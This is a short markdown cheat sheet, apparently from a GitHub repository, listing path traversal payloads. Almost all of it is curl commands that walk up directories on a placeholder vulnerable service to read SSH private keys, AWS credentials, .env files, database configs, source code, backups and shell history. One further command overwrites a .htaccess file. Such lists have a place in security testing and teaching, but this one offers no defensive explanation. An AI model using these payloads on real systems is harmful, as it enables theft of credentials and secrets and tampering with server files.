Skip to content

Latest commit

 

History

History
60 lines (45 loc) · 1.51 KB

Path_Traversal.md

File metadata and controls

60 lines (45 loc) · 1.51 KB

Path Traversal

Table of Contents

Information Disclosure

Credentials used for remote access can be exposed.

  • SSH key file exposure

    curl https://[VULNERABLE-SERVICE]/read?filename=../../../../home/user/.ssh/id_rsa

  • AWS credential exposure

    curl https://[VULNERABLE-SERVICE]/read?filename=../../../../home/user/.aws/credentials

Sensitive information used in project can be exposed.

  • Hard-coded secret information exposure

    curl https://[VULNERABLE-SERVICE]/read?filename=../../../../config/db_config.php

  • Source code exposure

    curl https://[VULNERABLE-SERVICE]/read?filename=../../../../app.js

  • Application’s environment variable information exposure

    curl https://[VULNERABLE-SERVICE]/read?filename=../../../../.env

  • Backup file exposure

    curl https://[VULNERABLE-SERVICE]/read?filename=../../../../backup/backup.zip

  • Environment variable exposure

    curl https://[VULNERABLE-SERVICE]/read?filename=../../../../home/user/.bashrc

  • Command history exposure

    curl https://[VULNERABLE-SERVICE]/read?filename=../../../../home/user/.bash_history

Arbitrary File Modification

Key files can be overwritten or deleted.

  • Overwrite .htaccess file 
    curl https://[VULNERABLE-SERVICE]/upload?filename=../../../../.htaccess